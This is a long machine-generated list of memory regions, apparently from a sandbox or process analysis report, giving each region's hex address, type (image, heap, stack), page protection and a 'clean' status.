unkown
page read and write
 clean
7FF00210000
unkown
page read and write
 clean
AF0000
unkown
page read and write
 clean
4A00000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
1E9B000
heap private
page read and write
 clean
2518000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
360E000
unkown
page read and write
 clean
1C980000
unkown
page read and write
 clean
29BA000
heap private
page execute and read and write
 clean
30000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
7FFFFFC0000
unkown image
page readonly
 clean
7FFFFFC2000
unkown image
page readonly
 clean
20000
unkown image
page readonly
 clean
1EB000
unkown
page read and write
 clean
170000
heap default
page read and write
 clean
520000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
2FB1000
unkown
page read and write
 clean
22FD000
stack
page read and write
 clean
A70000
unkown
page read and write
 clean
4FCE000
stack
page read and write
 clean
2240000
unkown image
page read and write
 clean
21A0000
unkown
page read and write
 clean
163000
unkown
page execute and read and write
 clean
A70000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
1DC000
heap default
page read and write
 clean
520000
unkown
page read and write
 clean
252000
heap default
page read and write
 clean
32F9000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
534F000
stack
page read and write
 clean
A70000
unkown
page read and write
 clean
7FF00105000
unkown
page read and write
 clean
363E000
unkown
page read and write
 clean
529000
unkown
page read and write
 clean
4820000
unkown
page read and write
 clean
1FC0000
unkown
page read and write
 clean
AF1000
unkown
page read and write
 clean
8D8C000
stack
page read and write
 clean
7FF001A0000
unkown
page read and write
 clean
D6E000
unkown image
page readonly
 clean
CF0000
unkown image
page readonly
 clean
520000
unkown
page read and write
 clean
30F6000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
6B10000
stack
page read and write
 clean
313D000
unkown
page read and write
 clean
30B6000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
D6E000
unkown image
page readonly
 clean
D6E000
unkown image
page readonly
 clean
4E5000
unkown
page read and write
 clean
390000
unkown image
page readonly
 clean
32A1000
unkown
page read and write
 clean
3058000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
1D50000
unkown image
page readonly
 clean
4E0000
unkown
page read and write
 clean
28E0000
unkown
page read and write
 clean
7FF0003A000
unkown
page execute and read and write
 clean
EA000
unkown
page read and write
 clean
2333000
unkown
page read and write
 clean
AF0000
unkown
page read and write
 clean
4834000
heap private
page read and write
 clean
1BDDE000
stack
page read and write
 clean
61BC000
stack
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
D0000
unkown image
page readonly
 clean
3B13000
unkown
page read and write
 clean
500000
unkown image
page readonly
 clean
5C0000
heap private
page read and write
 clean
25EE000
unkown
page read and write
 clean
309B000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
2850000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
1F3B000
heap private
page read and write
 clean
2E20000
unkown image
page readonly
 clean
AE0000
unkown
page read and write
 clean
2C9A000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
400000
unkown
page execute and read and write
 clean
90000
unkown image
page read and write
 clean
1B00000
unkown image
page readonly
 clean
C6000
unkown
page read and write
 clean
74B0000
unkown
page read and write
 clean
844000
heap default
page read and write
 clean
1C980000
unkown
page read and write
 clean
3A18000
unkown
page read and write
 clean
7FF001F0000
unkown
page execute and read and write
 clean
36F4000
unkown
page read and write
 clean
525000
unkown
page read and write
 clean
2A0000
heap private
page execute and read and write
 clean
7FF00280000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
2FDE000
unkown
page read and write
 clean
50B0000
unkown
page read and write
 clean
35D1000
unkown
page read and write
 clean
30CB000
unkown
page read and write
 clean
1B06000
unkown
page read and write
 clean
170000
unkown
page read and write
 clean
1B928000
unkown
page read and write
 clean
4A10000
unkown
page read and write
 clean
510000
unkown image
page readonly
 clean
306E000
unkown
page read and write
 clean
3017000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
2ABE000
stack
page read and write
 clean
D80000
unkown image
page readonly
 clean
3280000
unkown
page read and write
 clean
30AD000
unkown
page read and write
 clean
7FF001B0000
unkown
page execute and read and write
 clean
400000
unkown
page execute and read and write
 clean
60F0000
unkown
page read and write
 clean
1F05000
heap private
page read and write
 clean
50000
unkown image
page readonly
 clean
7EFD0000
unkown image
page readonly
 clean
7EFC0000
unkown image
page readonly
 clean
7FFFFFB0000
unkown image
page readonly
 clean
4E5000
unkown
page read and write
 clean
7EFE0000
unkown image
page readonly
 clean
280000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
29D0000
unkown
page read and write
 clean
24EB000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
AF0000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
A70000
unkown
page read and write
 clean
22A1000
unkown
page read and write
 clean
2404000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
2FFD000
unkown
page read and write
 clean
597D000
unkown
page read and write
 clean
10000
unkown image
page read and write
 clean
2B30000
heap private
page execute and read and write
 clean
ACE000
stack
page read and write
 clean
3692000
unkown
page read and write
 clean
A0000
unkown
page read and write
 clean
B80000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
1B962000
unkown
page read and write
 clean
21F0000
unkown
page read and write
 clean
7FF00220000
unkown
page execute and read and write
 clean
43D0000
unkown
page read and write
 clean
5B0000
heap private
page read and write
 clean
6C12000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
B67000
unkown
page read and write
 clean
48D0000
heap private
page execute and read and write
 clean
4E0000
unkown
page read and write
 clean
40000
unkown image
page readonly
 clean
2B16000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
10000
unkown image
page read and write
 clean
3601000
unkown
page read and write
 clean
7FF001D0000
unkown
page execute and read and write
 clean
AD0000
unkown
page read and write
 clean
7FF0004C000
unkown
page execute and read and write
 clean
2850000
unkown
page read and write
 clean
32CA000
unkown
page read and write
 clean
3678000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
5350000
unkown image
page read and write
 clean
223F000
stack
page read and write
 clean
310A000
unkown
page read and write
 clean
2260000
stack
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
26F0000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
2522000
unkown
page read and write
 clean
7FF000F0000
unkown
page read and write
 clean
CF0000
unkown image
page readonly
 clean
546E000
stack
page read and write
 clean
520000
unkown
page read and write
 clean
3D0000
heap private
page read and write
 clean
3439000
unkown
page read and write
 clean
300000
heap default
page read and write
 clean
7FFFFF00000
unkown
page execute and read and write
 clean
3B02000
unkown
page read and write
 clean
CEE000
stack
page read and write
 clean
140000
unkown image
page readonly
 clean
A70000
unkown
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
60000
unkown image
page readonly
 clean
50000
unkown image
page readonly
 clean
55A0000
unkown
page read and write
 clean
5565000
heap private
page read and write
 clean
4E5000
unkown
page read and write
 clean
2300000
unkown image
page readonly
 clean
28CA000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
6856000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
21F000
heap default
page read and write
 clean
3B3D000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
7FF000F2000
unkown
page execute and read and write
 clean
A70000
unkown
page read and write
 clean
22AE000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
A7A000
unkown
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
50000
unkown image
page readonly
 clean
28B0000
unkown
page read and write
 clean
21A0000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
390000
unkown image
page readonly
 clean
4E5000
unkown
page read and write
 clean
30BD000
unkown
page read and write
 clean
2180000
unkown
page read and write
 clean
2DEF000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
7FF00290000
unkown
page execute and read and write
 clean
C5000
unkown
page read and write | page guard
 clean
534E000
stack
page read and write | page guard
 clean
3A57000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
1AD0000
unkown
page read and write
 clean
1E60000
heap private
page read and write
 clean
54D0000
heap private
page read and write
 clean
615E000
stack
page read and write
 clean
290000
heap default
page read and write
 clean
2180000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
3739000
unkown
page read and write
 clean
C70000
unkown
page read and write
 clean
525000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
7FF00240000
unkown
page execute and read and write
 clean
12F01000
unkown
page read and write
 clean
2CB0000
heap private
page read and write
 clean
5C1C000
stack
page read and write
 clean
32C3000
unkown
page read and write
 clean
657E000
stack
page read and write
 clean
36A2000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
3539000
unkown
page read and write
 clean
7EF30000
unkown
page execute and read and write
 clean
308E000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
A60000
unkown image
page read and write
 clean
AF2000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
26F0000
unkown
page read and write
 clean
1C78E000
stack
page read and write
 clean
31F8000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
75A1000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
3130000
unkown
page read and write
 clean
3A38000
unkown
page read and write
 clean
43C0000
unkown
page read and write
 clean
36BB000
unkown
page read and write
 clean
CF0000
unkown image
page readonly
 clean
30EE000
unkown
page read and write
 clean
6760000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
AD5000
unkown
page read and write
 clean
413000
heap default
page read and write
 clean
4E5000
unkown
page read and write
 clean
3679000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
520000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
7FF00260000
unkown
page execute and read and write
 clean
3672000
unkown
page read and write
 clean
8D90000
unkown
page read and write
 clean
302C000
unkown
page read and write
 clean
3685000
unkown
page read and write
 clean
3071000
unkown
page read and write
 clean
D6E000
unkown image
page readonly
 clean
A70000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
7FF00210000
unkown
page read and write
 clean
240000
unkown
page read and write
 clean
7200000
stack
page read and write
 clean
AF0000
unkown
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
30FC000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
928000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
B3D000
stack
page read and write
 clean
2890000
unkown
page read and write
 clean
60EE000
stack
page read and write
 clean
369F000
unkown
page read and write
 clean
182000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
D6E000
unkown image
page readonly
 clean
32A0000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
4E5000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
25B4000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
4F0000
unkown
page read and write
 clean
B40000
heap private
page read and write
 clean
1C980000
unkown
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
525000
unkown
page read and write
 clean
3AF0000
unkown
page read and write
 clean
3B18000
unkown
page read and write
 clean
3A1D000
unkown
page read and write
 clean
21A0000
unkown
page read and write
 clean
AF0000
unkown
page read and write
 clean
7C0000
heap private
page read and write
 clean
1B430000
unkown
page read and write
 clean
485C000
stack
page read and write
 clean
49EE000
unkown
page read and write
 clean
40000
unkown image
page readonly
 clean
5D8B000
unkown
page read and write
 clean
2AE0000
unkown
page read and write
 clean
7EB0000
unkown
page read and write
 clean
70000
unkown
page read and write
 clean
3B4C000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
30000
unkown image
page readonly
 clean
26F0000
unkown
page read and write
 clean
240000
heap default
page read and write
 clean
523000
unkown
page read and write
 clean
369E000
unkown
page read and write
 clean
2FAB000
unkown
page read and write
 clean
38B5000
unkown
page read and write
 clean
3307000
unkown
page read and write
 clean
21A0000
unkown
page read and write
 clean
1DD0000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
3097000
unkown
page read and write
 clean
2516000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
7FF00132000
unkown
page execute and read and write
 clean
1F20000
heap private
page read and write
 clean
4E0000
unkown
page read and write
 clean
558C000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
580000
unkown image
page readonly
 clean
400000
unkown
page execute and read and write
 clean
7EFB0000
unkown image
page readonly
 clean
A70000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
2CB4000
heap private
page read and write
 clean
207000
unkown
page read and write
 clean
21BC000
heap private
page read and write
 clean
7FF00100000
unkown
page read and write
 clean
3B1A000
unkown
page read and write
 clean
CF0000
unkown image
page readonly
 clean
7EFC0000
unkown image
page readonly
 clean
295000
unkown
page execute and read and write
 clean
373C000
unkown
page read and write
 clean
58FE000
stack
page read and write
 clean
43C000
heap default
page read and write
 clean
2850000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
13012000
unkown
page read and write
 clean
30D8000
unkown
page read and write
 clean
3AB4000
unkown
page read and write
 clean
329D000
unkown
page read and write
 clean
9C90000
unkown
page read and write
 clean
4650000
unkown
page read and write
 clean
510000
heap private
page read and write
 clean
1B909000
unkown
page read and write
 clean
7FF001C0000
unkown
page read and write
 clean
A40000
unkown image
page readonly
 clean
309E000
unkown
page read and write
 clean
2FDB000
unkown
page read and write
 clean
21A9000
heap private
page read and write
 clean
2850000
unkown
page read and write
 clean
AF0000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
6560000
unkown
page read and write
 clean
43E0000
unkown
page read and write
 clean
2FCD000
unkown
page read and write
 clean
7E0000
unkown
page read and write
 clean
27D0000
unkown image
page readonly
 clean
32C9000
unkown
page read and write
 clean
310D000
unkown
page read and write
 clean
7FF00042000
unkown
page execute and read and write
 clean
1F9000
heap default
page read and write
 clean
26F0000
unkown
page read and write
 clean
5C4000
heap private
page read and write
 clean
20000
unkown image
page read and write
 clean
354B000
unkown
page read and write
 clean
7FF001C0000
unkown
page read and write
 clean
3B1C000
unkown
page read and write
 clean
530000
heap default
page read and write
 clean
A70000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
6A1F000
stack
page read and write
 clean
2FCB000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
2AF0000
heap private
page execute and read and write
 clean
3688000
unkown
page read and write
 clean
750000
unkown image
page readonly
 clean
368F000
unkown
page read and write
 clean
49F0000
unkown
page read and write
 clean
1ADF0000
unkown
page read and write
 clean
30F4000
unkown
page read and write
 clean
60000
unkown image
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
7FF00132000
unkown
page execute and read and write
 clean
21BA000
heap private
page read and write
 clean
305C000
unkown
page read and write
 clean
29CF000
stack
page read and write
 clean
517000
heap private
page read and write
 clean
4934000
heap private
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
2250000
stack
page read and write
 clean
3228000
unkown
page read and write
 clean
3AA0000
unkown
page read and write
 clean
525000
unkown
page read and write
 clean
2FBB000
unkown
page read and write
 clean
60F0000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
2FD8000
unkown
page read and write
 clean
CF2000
unkown image
page execute read
 clean
3459000
unkown
page read and write
 clean
364C000
unkown
page read and write
 clean
22FF000
stack
page read and write
 clean
4E5000
unkown
page read and write
 clean
2AD0000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
1C7B0000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
1B4DF000
unkown
page read and write
 clean
5B2E000
unkown
page read and write
 clean
23C0000
heap private
page read and write
 clean
60000
unkown image
page readonly
 clean
3100000
unkown
page read and write
 clean
3250000
unkown
page read and write
 clean
D6E000
unkown image
page readonly
 clean
552E000
stack
page read and write
 clean
4E5000
unkown
page read and write
 clean
1B4AC000
unkown
page read and write
 clean
20000
unkown image
page read and write
 clean
260000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
12DBC000
unkown
page read and write
 clean
365C000
unkown
page read and write
 clean
80000
unkown image
page read and write
 clean
30B2000
unkown
page read and write
 clean
7EFDF000
unkown
page read and write
 clean
30DE000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
87000
heap default
page read and write
 clean
1B90000
unkown image
page readonly
 clean
150000
unkown
page read and write
 clean
5ECE000
unkown
page read and write
 clean
3A9D000
unkown
page read and write
 clean
A80000
unkown
page read and write
 clean
CF2000
unkown image
page execute read
 clean
304E000
unkown
page read and write
 clean
1C980000
unkown
page read and write
 clean
33D9000
unkown
page read and write
 clean
1C980000
unkown
page read and write
 clean
5530000
unkown
page read and write
 clean
7EFE0000
unkown image
page readonly
 clean
1C7B0000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
605000
heap default
page read and write
 clean
1EB000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
1C980000
unkown
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
1B475000
unkown
page read and write
 clean
19B000
unkown
page execute and read and write
 clean
7EFB0000
unkown image
page readonly
 clean
3B0F000
unkown
page read and write
 clean
308D000
unkown
page read and write
 clean
30DF000
unkown
page read and write
 clean
636E000
stack
page read and write
 clean
AD0000
unkown
page read and write
 clean
61F000
heap default
page read and write
 clean
1C980000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
370000
heap private
page read and write
 clean
460000
unkown
page read and write
 clean
14F000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
CF2000
unkown image
page execute read
 clean
F0000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
3459000
unkown
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
3139000
unkown
page read and write
 clean
62BC000
stack
page read and write
 clean
7FF000F0000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
4930000
heap private
page read and write
 clean
12D65000
unkown
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
5280000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
3352000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
43B0000
unkown
page read and write
 clean
43F000
heap default
page read and write
 clean
80000
unkown image
page read and write
 clean
CF2000
unkown image
page execute read
 clean
7EFB2000
unkown image
page readonly
 clean
A75000
unkown
page read and write
 clean
270000
unkown
page read and write
 clean
1B4B7000
unkown
page read and write
 clean
1AE000
heap default
page read and write
 clean
60000
unkown image
page readonly
 clean
C80000
unkown
page read and write
 clean
5B0000
unkown
page read and write
 clean
5B7D000
stack
page read and write
 clean
31FD000
unkown
page read and write
 clean
27C0000
unkown image
page readonly
 clean
3337000
unkown
page read and write
 clean
270000
unkown
page read and write
 clean
3AC2000
unkown
page read and write
 clean
350000
unkown image
page readonly
 clean
110000
heap private
page execute and read and write
 clean
1B943000
unkown
page read and write
 clean
2DBF000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
1C980000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
AD0000
unkown
page read and write
 clean
21F0000
unkown
page execute and read and write
 clean
4E5000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
312A000
unkown
page read and write
 clean
12D95000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
7FF00040000
unkown
page read and write
 clean
1B9C0000
unkown
page read and write
 clean
D6E000
unkown image
page readonly
 clean
2340000
unkown image
page readonly
 clean
AF0000
unkown image
page readonly
 clean
28B4000
unkown
page read and write
 clean
590000
unkown
page execute and read and write
 clean
CF2000
unkown image
page execute read
 clean
26F0000
unkown
page read and write
 clean
150000
unkown image
page readonly
 clean
A00000
unkown
page read and write
 clean
54E0000
stack
page read and write
 clean
7FF00207000
unkown
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
AD0000
unkown
page read and write
 clean
3B24000
unkown
page read and write
 clean
CF0000
unkown image
page readonly
 clean
CF2000
unkown image
page execute read
 clean
39E000
heap default
page read and write
 clean
A70000
unkown
page read and write
 clean
307A000
unkown
page read and write
 clean
30C6000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
7EFE0000
unkown image
page readonly
 clean
4E5000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
28EF000
stack
page read and write
 clean
40000
unkown image
page readonly
 clean
1B93C000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
7FF00105000
unkown
page read and write
 clean
7FF00230000
unkown
page read and write
 clean
CF0000
unkown image
page readonly
 clean
A70000
unkown
page read and write
 clean
5A0000
heap private
page read and write
 clean
3127000
unkown
page read and write
 clean
32B0000
unkown
page read and write
 clean
522000
unkown
page read and write
 clean
578E000
stack
page read and write
 clean
4E0000
unkown
page read and write
 clean
3E0000
unkown image
page readonly
 clean
7EFB0000
unkown image
page readonly
 clean
21A0000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
12FE0000
unkown
page read and write
 clean
229F000
stack
page read and write
 clean
4E0000
unkown
page read and write
 clean
34CF000
unkown
page read and write
 clean
307E000
unkown
page read and write
 clean
8E4000
unkown
page read and write
 clean
7EFDF000
unkown
page read and write
 clean
7FF000F2000
unkown
page execute and read and write
 clean
29B000
unkown
page execute and read and write
 clean
3293000
unkown
page read and write
 clean
5BCE000
stack
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
21F0000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
D6E000
unkown image
page readonly
 clean
AF0000
unkown
page read and write
 clean
10D000
unkown
page execute and read and write
 clean
236000
unkown
page read and write
 clean
5560000
heap private
page read and write
 clean
2367000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
90000
unkown
page read and write
 clean
190000
unkown
page read and write
 clean
CF2000
unkown image
page execute read
 clean
7EFD0000
unkown image
page readonly
 clean
2FBF000
unkown
page read and write
 clean
55A7000
unkown
page read and write
 clean
1CF0000
unkown image
page readonly
 clean
21A5000
heap private
page read and write
 clean
442E000
stack
page read and write
 clean
50000
unkown image
page readonly
 clean
4E6E000
stack
page read and write
 clean
25A8000
unkown
page read and write
 clean
36BE000
unkown
page read and write
 clean
329A000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
4E0000
unkown
page read and write
 clean
21A4000
unkown
page read and write
 clean
400000
unkown
page execute and read and write
 clean
7FF00190000
unkown
page execute and read and write
 clean
454F000
stack
page read and write
 clean
4E0000
unkown
page read and write
 clean
1B15000
heap private
page read and write
 clean
1B4B000
heap private
page read and write
 clean
60000
unkown image
page readonly
 clean
7FF00180000
unkown
page execute and read and write
 clean
26F0000
unkown
page read and write
 clean
5B6E000
stack
page read and write
 clean
2850000
unkown
page read and write
 clean
195000
unkown
page execute and read and write
 clean
A74000
unkown
page read and write
 clean
520000
unkown image
page readonly
 clean
7EFC0000
unkown image
page readonly
 clean
2241000
stack
page read and write
 clean
4E2C000
stack
page read and write
 clean
26A000
unkown
page read and write
 clean
2D9F000
unkown
page read and write
 clean
3D4000
heap private
page read and write
 clean
CF0000
unkown image
page readonly
 clean
2850000
unkown
page read and write
 clean
349F000
unkown
page read and write
 clean
2CA5000
unkown
page read and write
 clean
525000
unkown
page read and write
 clean
7962000
unkown
page read and write
 clean
160000
unkown image
page read and write
 clean
1C97E000
stack
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
55A0000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
313A000
unkown
page read and write
 clean
62C0000
unkown
page read and write
 clean
33FA000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
2FA8000
unkown
page read and write
 clean
475F000
stack
page read and write
 clean
7FF00200000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
4E5000
unkown
page read and write
 clean
3ACC000
unkown
page read and write
 clean
3297000
unkown
page read and write
 clean
CF0000
unkown image
page readonly
 clean
4E0000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
26F0000
unkown
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
21A0000
unkown
page read and write
 clean
367C000
unkown
page read and write
 clean
9FE000
stack
page read and write
 clean
3619000
unkown
page read and write
 clean
18A000
unkown
page execute and read and write
 clean
1B94F000
unkown
page read and write
 clean
390000
unkown
page read and write
 clean
1C980000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
A70000
unkown
page read and write
 clean
1B90B000
unkown
page read and write
 clean
296F000
stack
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
50000
unkown image
page readonly
 clean
67A2000
unkown
page read and write
 clean
312D000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
CF0000
unkown image
page readonly
 clean
2180000
unkown
page read and write
 clean
2AD0000
heap private
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
520000
unkown
page read and write
 clean
2DBF000
unkown
page read and write
 clean
7FFFFF00000
unkown
page execute and read and write
 clean
7EFC0000
unkown image
page readonly
 clean
8EA000
unkown
page read and write
 clean
4F0000
unkown
page read and write
 clean
CA0000
unkown
page read and write
 clean
CF0000
unkown image
page readonly
 clean
1B47D000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
1C810000
heap private
page read and write
 clean
1C20000
heap private
page read and write
 clean
3AD2000
unkown
page read and write
 clean
3AF4000
unkown
page read and write
 clean
630000
unkown image
page readonly
 clean
3269000
unkown
page read and write
 clean
A50000
unkown image
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
5531000
unkown
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
3676000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
400000
unkown
page execute and read and write
 clean
BDF000
stack
page read and write
 clean
2D5E000
stack
page read and write | page guard
 clean
7FFFFFC0000
unkown image
page readonly
 clean
4E0000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
3AE3000
unkown
page read and write
 clean
CF0000
unkown image
page readonly
 clean
2190000
unkown
page read and write
 clean
1C7B0000
unkown
page read and write
 clean
5290000
unkown
page read and write
 clean
32D0000
unkown
page read and write
 clean
3AD9000
unkown
page read and write
 clean
3AA3000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
5B0000
unkown
page read and write
 clean
525000
unkown
page read and write
 clean
33B1000
unkown
page read and write
 clean
2D5F000
stack
page read and write
 clean
5C0000
unkown
page read and write
 clean
270000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
7FF00170000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
2D8E000
stack
page read and write | page guard
 clean
448000
unkown
page read and write
 clean
1BF000
heap default
page read and write
 clean
AD0000
unkown
page read and write
 clean
30AF000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
29B0000
heap private
page execute and read and write
 clean
A70000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
6339000
unkown
page read and write
 clean
5582000
heap private
page read and write
 clean
4F0000
unkown
page read and write
 clean
1C980000
unkown
page read and write
 clean
537000
heap default
page read and write
 clean
12FB0000
unkown
page read and write
 clean
3022000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
310000
heap default
page read and write
 clean
10000
unkown image
page read and write
 clean
1EE0000
unkown image
page readonly
 clean
7FF00040000
unkown
page read and write
 clean
324C000
unkown
page read and write
 clean
630D000
unkown
page read and write
 clean
7FFFFF10000
unkown
page execute and read and write
 clean
1F25000
heap private
page read and write
 clean
AD0000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
38A8000
unkown
page read and write
 clean
10000
unkown image
page read and write
 clean
75AB000
unkown
page read and write
 clean
FD000
unkown
page execute and read and write
 clean
7FF00230000
unkown
page read and write
 clean
20000
unkown
page read and write
 clean
297000
unkown
page execute and read and write
 clean
3028000
unkown
page read and write
 clean
322D000
unkown
page read and write
 clean
305E000
unkown
page read and write
 clean
7FF001F0000
unkown
page execute and read and write
 clean
80000
heap default
page read and write
 clean
3619000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
30000
unkown image
page readonly
 clean
3689000
unkown
page read and write
 clean
B80000
unkown
page read and write
 clean
74B0000
unkown
page read and write
 clean
3735000
unkown
page read and write
 clean
60F0000
unkown
page read and write
 clean
525000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
3839000
unkown
page read and write
 clean
4F8D000
stack
page read and write
 clean
A70000
unkown
page read and write
 clean
B90000
unkown
page read and write
 clean
55AA000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
650000
unkown image
page readonly
 clean
7EFB0000
unkown image
page readonly
 clean
443000
heap default
page read and write
 clean
7FF0010A000
unkown
page execute and read and write
 clean
50000
unkown image
page readonly
 clean
2180000
unkown
page read and write
 clean
73EE000
unkown
page read and write
 clean
2F9B000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
AF0000
unkown
page read and write
 clean
5C40000
stack
page read and write
 clean
354A000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
12E71000
unkown
page read and write
 clean
632D000
unkown
